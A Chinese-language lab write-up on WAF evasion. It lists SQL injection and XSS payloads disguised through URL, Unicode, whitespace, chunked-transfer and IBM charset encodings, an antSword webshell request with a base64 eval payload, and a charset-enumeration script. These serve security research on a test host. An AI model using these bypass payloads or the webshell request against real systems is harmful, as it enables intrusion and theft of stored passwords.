1
概述
2
常见编码方式研究
2.1 URL编码
http://192.168.213.180:10001/xss.asp?output=xxxxx%252f%252a%252a%252f
http://192.168.213.180:10003/sqli.php?id=1%252f%252aunion%20select%201,2,3,4%20%20%252a%252f
WAF: 1/*union select 1,2,3,4 */
SERVER: 1%2f%2aunion select 1,2,3,4 %2a%2f
1、通过注释符引入
http://192.168.213.180:10003/sqli.php?id=1%20--%20%252f%252a%0aunion%20select%201,2,3,4%20%20--%20%252a%252f
2、通过单引号引入
http://192.168.213.180:10003/sqli.php?id=%27%252f%252a%27union%20select%201,2,3,%27%252a%252f%27
2.2 BASE64编码
http://192.168.213.180:10001/sqli.asp?id=MSB1bmlvbiBzZWxlY3QgMSwyLDMsNA==
POST /shell.aspx HTTP/1.1
Host: 192.168.213.180:10001
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 742
Connection: close
z=UmVzcG9uc2UuV3JpdGUoImJlNjE1MGJkZTAiKTt2YXIgZXJyOkV4Y2VwdGlvbjt0cnl7ZXZhbChTeXN0ZW0uVGV4dC5FbmNvZGluZy5HZXRFbmNvZGluZygiVVRGLTgiKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZygiZG1GeUlHTTlVM2x6ZEdWdExrbFBMa1JwY21WamRHOXllUzVIWlhSTWIyZHBZMkZzUkhKcGRtVnpLQ2s3VW1WemNHOXVjMlV1VjNKcGRHVW9VMlZ5ZG1WeUxrMWhjRkJoZEdnb0lpNGlLU3NpQ1NJcE8yWnZjaWgyWVhJZ2FUMHdPMms4UFdNdWJHVnVaM1JvTFRFN2FTc3JLVkpsYzNCdmJuTmxMbGR5YVhSbEtHTmJhVjFiTUYwcklqb2lLVHRTWlhOd2IyNXpaUzVYY21sMFpTZ2lDU0lyUlc1MmFYSnZibTFsYm5RdVQxTldaWEp6YVc5dUt5SUpJaWs3VW1WemNHOXVjMlV1VjNKcGRHVW9SVzUyYVhKdmJtMWxiblF1VlhObGNrNWhiV1VwT3c9PSIpKSwidW5zYWZlIik7fWNhdGNoKGVycil7UmVzcG9uc2UuV3JpdGUoIkVSUk9SOi8vICIrZXJyLm1lc3NhZ2UpO31SZXNwb25zZS5Xcml0ZSgiOTUwMjJmZWYwIik7UmVzcG9uc2UuRW5kKCk7
2.3 Unicode编码
e-->%u0045-->%u0065-->%u00f0
t-->%u0054-->%u0074-->%u00de-->%u00fe
o-->%u004f-->%u006f-->%u00ba
d-->%u0044-->%u0064-->%u00d0
2.4 空格编码
http://192.168.213.180:10001/sqli.asp?id=1%0aand%201=1
%01,%02,%03,%04,%05,%06,%07,%08,%0e,%0f
%11,%12,%13,%14,%15,%16,%17,%18,%19,%1a,%1b,%1c,%1d,%1e, %1f
%u3000
http://192.168.213.180:10001/sqli.asp?id=1%20and%201=2%20union%20select%201,password%20from%20users
http://192.168.213.180:10001/sqli.asp?id=1%0eand%201=2%20union%0eselect%201,password%0efrom%20users
http://192.168.213.180:10001/sqli.asp?id=1%u3000and%201=2%20union%u3000select%201,password%u3000from%20users
http://192.168.213.180:10003/sqli.php?id=1%20%a0and%201=2%a0union%a0select%201,2,3,password%a0from%20users
2.5 分块传输
http://192.168.213.180:10003/sqli.php
POST:
id=1 union select 1,2,3,password from users
POST /sqli.php HTTP/1.1
Host: 192.168.213.180:10003
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Transfer-Encoding: chunked
e
id=1 union sel
1d
ect 1,2,3,password from users
0
2.6 IBM编码
http://192.168.213.180:10001/test.aspx
POST:
output=1 union select 1,2,3,4 from users
POST /test.aspx HTTP/1.1
Host: 192.168.213.180:10001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=cp875
Content-Length: 112
%96%A4%A3%97%A4%A3=%F1%40%A4%95%89%96%95%40%A2%85%93%85%83%A3%40%F1k%F2k%F3k%F4%40%86%99%96%94%40%A4%A2%85%99%A2
POST /test.aspx HTTP/1.1
Host: 192.168.213.180:10001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: UP foobar
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded;
x-up-devcap-post-charset: cp875
Content-Length: 34
%96%A4%A3%97%A4%A3=%F1%40%A4%95%89%96%95%40%A2%85%93%85%83%A3%40%F1k%F2k%F3k%F4%40%86%99%96%94%40%A4%A2%85%99%A2
2.7 UTF编码
测试的时候发现,不管使用哪种编码方式的UTF编码,均不能绕过WAF。原因是该WAF在进行正则匹配之前会去掉所有的%00,而UTF编码是通过%00来补位,去除%00之后所有的UTF编码都会编程正常可见的字符。
3
思索一些其他问题
3.1 全部的编码方式有哪些
#!/usr/bin/env python2
import urllib,sys
def encode_charset(text, charset):
result =""
equalSign = "="
ampersand = "&"
params_list = text.split("&")
for param_pair in params_list:
param, value = param_pair.split("=", 1)
param = param.encode(charset)
value = value.encode(charset)
param = urllib.quote_plus(param)
value = urllib.quote_plus(value)
if result:
result += ampersand
result += param + equalSign + value
return result
def decode_charset(text, charset):
result = ""
equalSign = "="
ampersand = "&"
#
if "&" not in text:
params_list = text.split(urllib.quote_plus(ampersand.encode(charset)))
else:
params_list = text.split("&")
#
for param_pair in params_list:
if "=" not in text:
param, value = param_pair.split(equalSign.encode(charset))
else:
param, value = param_pair.split("=", 1)
param = urllib.unquote(param)
value = urllib.unquote(value)
param = param.decode(charset)
value = value.decode(charset)
if result:
result += ampersand
result += param + equalSign + value
return result
results = {}
charsets = '''US-ASCII,ISO-8859-1,ISO_8859-1:1987,ISO-8859-2,ISO_8859-2:1987,ISO-8859-3,ISO_8859-3:1988,ISO-8859-4,ISO_8859-4:1988,ISO-8859-5,ISO_8859-5:1988,ISO-8859-6,ISO_8859-6:1987,ISO-8859-7,ISO_8859-7:1987,ISO-8859-8,ISO_8859-8:1988,ISO-8859-9,ISO_8859-9:1989,ISO-8859-10,ISO_6937-2-add,JIS_X0201,JIS_Encoding,Shift_JIS,EUC-JP,Extended_UNIX_Code_Packed_Format_for_Japanese,Extended_UNIX_Code_Fixed_Width_for_Japanese,BS_4730,SEN_850200_C,IT,ES,DIN_66003,NS_4551-1,NF_Z_62-010,ISO-10646-UTF-1,ISO_646.basic:1983,INVARIANT,ISO_646.irv:1983,NATS-SEFI,NATS-SEFI-ADD,NATS-DANO,NATS-DANO-ADD,SEN_850200_B,KS_C_5601-1987,ISO-2022-KR,EUC-KR,ISO-2022-JP,ISO-2022-JP-2,JIS_C6220-1969-jp,JIS_C6220-1969-ro,PT,greek7-old,latin-greek,NF_Z_62-010_(1973),Latin-greek-1,ISO_5427,JIS_C6226-1978,BS_viewdata,INIS,INIS-8,INIS-cyrillic,ISO_5427:1981,ISO_5428:1980,GB_1988-80,GB_2312-80,NS_4551-2,videotex-suppl,PT2,ES2,MSZ_7795.3,JIS_C6226-1983,greek7,ASMO_449,iso-ir-90,JIS_C6229-1984-a,JIS_C6229-1984-b,JIS_C6229-1984-b-add,JIS_C6229-1984-hand,JIS_C6229-1984-hand-add,JIS_C6229-1984-kana,ISO_2033-1983,ANSI_X3.110-1983,T.61-7bit,T.61-8bit,ECMA-cyrillic,CSA_Z243.4-1985-1,CSA_Z243.4-1985-2,CSA_Z243.4-1985-gr,ISO-8859-6-E,ISO_8859-6-E,ISO-8859-6-I,ISO_8859-6-I,T.101-G2,ISO-8859-8-E,ISO_8859-8-E,ISO-8859-8-I,ISO_8859-8-I,CSN_369103,JUS_I.B1.002,IEC_P27-1,JUS_I.B1.003-serb,JUS_I.B1.003-mac,greek-ccitt,NC_NC00-10:81,ISO_6937-2-25,GOST_19768-74,ISO_8859-supp,ISO_10367-box,latin-lap,JIS_X0212-1990,DS_2089,us-dk,dk-us,KSC5636,UNICODE-1-1-UTF-7,ISO-2022-CN,ISO-2022-CN-EXT,UTF-8,ISO-8859-13,ISO-8859-14,ISO-8859-15,ISO-8859-16,GBK,GB18030,OSD_EBCDIC_DF04_15,OSD_EBCDIC_DF03_IRV,OSD_EBCDIC_DF04_1,ISO-11548-1,KZ-1048,ISO-10646-UCS-2,ISO-10646-UCS-4,ISO-10646-UCS-Basic,ISO-10646-Unicode-Latin1,ISO-10646-J-1,ISO-Unicode-IBM-1261,ISO-Unicode-IBM-1268,ISO-Unicode-IBM-1276,ISO-Unicode-IBM-1264,ISO-Unicode-IBM-1265,UNICODE-1-1,SCSU,UTF-7,UTF-16BE,UTF-16LE,UTF-16,CESU-8,UTF-32,UTF-32BE,UTF-32LE,BOCU-1,UTF-7-IMAP,ISO-8859-1-Windows-3.0-Latin-1,ISO-8859-1-Windows-3.1-Latin-1,ISO-8859-2-Windows-Latin-2,ISO-8859-9-Windows-Latin-5,hp-roman8,Adobe-Standard-Encoding,Ventura-US,Ventura-International,DEC-MCS,IBM850,PC8-Danish-Norwegian,IBM862,PC8-Turkish,IBM-Symbols,IBM-Thai,HP-Legal,HP-Pi-font,HP-Math8,Adobe-Symbol-Encoding,HP-DeskTop,Ventura-Math,Microsoft-Publishing,Windows-31J,GB2312,Big5,macintosh,IBM037,IBM038,IBM273,IBM274,IBM275,IBM277,IBM278,IBM280,IBM281,IBM284,IBM285,IBM290,IBM297,IBM420,IBM423,IBM424,IBM437,IBM500,IBM851,IBM852,IBM855,IBM857,IBM860,IBM861,IBM863,IBM864,IBM865,IBM868,IBM869,IBM870,IBM871,IBM880,IBM891,IBM903,IBM904,IBM905,IBM918,IBM1026,EBCDIC-AT-DE,EBCDIC-AT-DE-A,EBCDIC-CA-FR,EBCDIC-DK-NO,EBCDIC-DK-NO-A,EBCDIC-FI-SE,EBCDIC-FI-SE-A,EBCDIC-FR,EBCDIC-IT,EBCDIC-PT,EBCDIC-ES,EBCDIC-ES-A,EBCDIC-ES-S,EBCDIC-UK,EBCDIC-US,UNKNOWN-8BIT,MNEMONIC,MNEM,VISCII,VIQR,KOI8-R,HZ-GB-2312,IBM866,IBM775,KOI8-U,IBM00858,IBM00924,IBM01140,IBM01141,IBM01142,IBM01143,IBM01144,IBM01145,IBM01146,IBM01147,IBM01148,IBM01149,Big5-HKSCS,IBM1047,PTCP154,Amiga-1251,KOI7-switched,BRF,TSCII,CP51932,windows-874,windows-1250,windows-1251,windows-1252,windows-1253,windows-1254,windows-1255,windows-1256,windows-1257,windows-1258,TIS-620,CP50220'''
for charset in charsets.split(","):
charset = charset.strip()
try:
encrypt_str = encode_charset("id=1 union select 1,2,3,4 from users '\"><", charset)
if encrypt_str not in results.keys():
results[encrypt_str] = [charset]
else:
results[encrypt_str].append(charset)
except:
pass
print(results)
# if len(sys.argv) <= 2:
# print("Usage: python encrypt.py \"id=1 union select 1,2,3,4 from users\" ibm500")
# sys.exit()
# print(encode_charset(sys.argv[1], sys.argv[2]))
1)大多数编码对于ascii<128的字符并没有多大得差异。
2)IBM1026和其他IBM编码如IBM037,IBM424,IBM500的结果之间存在一定的差异,主要是双引号的编码方式不一样。
3)不是所有的IBM编码都是可以利用的,比如IBM437。
4)除了IBM和UTF编码,没有其他编码方式会导致WAF误会。
3.2 Unicode不同模式问题
C 代表 Composition 就是组合的意思
D 代表 Decomposition 就是分解的意思。
K 代表 Compatibility 就是兼容等价模式,如果不带K就是标准等价。
from flask import Flask, abort, request
import unicodedata
app = Flask(__name__)
def Welcome_name():
name = request.args.get('name')
name = unicodedata.normalize('NFKD', name)
return 'Test XSS: ' + name
if __name__ == '__main__':
app.run(host='0.0.0.0',port=80)
http://192.168.213.180:10003/?name=%EF%BC%9Cimg%20src%E2%81%BCp%20onerror%E2%81%BC%EF%BC%87prompt%E2%81%BD1%E2%81%BE%EF%BC%87%EF%B9%A5
4
总结